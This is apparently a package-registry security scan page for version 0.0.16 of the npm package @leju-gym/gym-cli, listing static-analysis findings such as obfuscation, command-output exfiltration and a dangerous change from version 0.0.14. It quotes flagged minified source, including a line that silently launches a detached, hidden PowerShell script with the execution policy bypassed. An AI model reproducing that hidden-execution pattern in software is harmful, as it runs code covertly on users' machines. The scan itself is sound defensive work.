registry  /  @leju-gym/gym-cli  /  0.0.16

@leju-gym/gym-cli@0.0.16

⚠ Under review

Gym CLI - 数据管理命令行工具

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 13 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.; previous stored version diff introduced dangerous source

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessDynamicRequireEnvironmentVarsFilesystem
Supply chain
HighEntropyStringsMinifiedObfuscatedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 196 KB of source, external domains: dev.lejugym.com, oss-cn-hangzhou.aliyuncs.com, test.lejugym.com, www.lejugym.com

Source & flagged code

5 flagged · loading source
bin/gym.jsView file
17const os = require("os"); L18: const { execSync } = require("child_process"); L19: const { pathToFileURL } = require("url");
High
Child Process

Package source references child process execution.

bin/gym.jsView on unpkg · L17
14*/ L15: const fs = require("fs"); L16: const path = require("path");
Medium
Dynamic Require

Package source references dynamic require/import behavior.

bin/gym.jsView on unpkg · L14
dist/gym.mjsView file
matchType = previous_version_dangerous_delta matchedPackage = @leju-gym/gym-cli@0.0.14 matchedIdentity = npm:QGxlanUtZ3ltL2d5bS1jbGk:0.0.14 similarity = 0.500 summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

dist/gym.mjsView on unpkg
1#!/usr/bin/env node L2: var vs=Object.defineProperty;var An=(t,e,n)=>()=>{if(n)throw n[0];try{return t&&(e=t(t=0)),e}catch(r){throw n=[r],r}};var xs=(t,e)=>{for(var n in e)vs(t,n,{get:e[n],enumerable:!0})... L3: BAG \u5217\u8868:`));for(let g of l){let m=We[g.status]||"\u672A\u77E5";console.log(`ID: ${g.id}`),console.log(`\u540D\u79F0: ${g.dataName||""}`),console.log(`\u8BBE\u5907: ${g....
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

dist/gym.mjsView on unpkg · L1
1#!/usr/bin/env node L2: var vs=Object.defineProperty;var An=(t,e,n)=>()=>{if(n)throw n[0];try{return t&&(e=t(t=0)),e}catch(r){throw n=[r],r}};var xs=(t,e)=>{for(var n in e)vs(t,n,{get:e[n],enumerable:!0})... L3: BAG \u5217\u8868:`));for(let g of l){let m=We[g.status]||"\u672A\u77E5";console.log(`ID: ${g.id}`),console.log(`\u540D\u79F0: ${g.dataName||""}`),console.log(`\u8BBE\u5907: ${g.... ... L13: `,"utf-8")}catch{}}log(e){this.options.debug&&console.log(`[DataSync] ${e}`),this.callbacks.onProgress?.(e)}sleep(e){return new Promise(n=>setTimeout(n,e))}get totalRemainingBytes(... L14: \u2550\u2550\u2550 \u4E0B\u8F7D\u5B8C\u6210 \u2550\u2550\u2550`)),console.log(_.green(` \u6210\u529F: ${e.successCount}`)),e.failCount>0&&console.log(_.red(` \u5931\u8D25: ${e.fa... L15: `);no(d,c,{encoding:"utf-8"}),oo("powershell.exe",["-NoProfile","-ExecutionPolicy","Bypass","-WindowStyle","Hidden","-File",d],{detached:!0,stdio:"ignore",windowsHide:!0}).unref()}...
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

dist/gym.mjsView on unpkg · L1

Findings

1 Critical4 High3 Medium5 Low
CriticalPrevious Version Dangerous Deltadist/gym.mjs
HighChild Processbin/gym.js
HighSame File Env Network Executiondist/gym.mjs
HighCommand Output Exfiltrationdist/gym.mjs
HighObfuscated
MediumDynamic Requirebin/gym.js
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings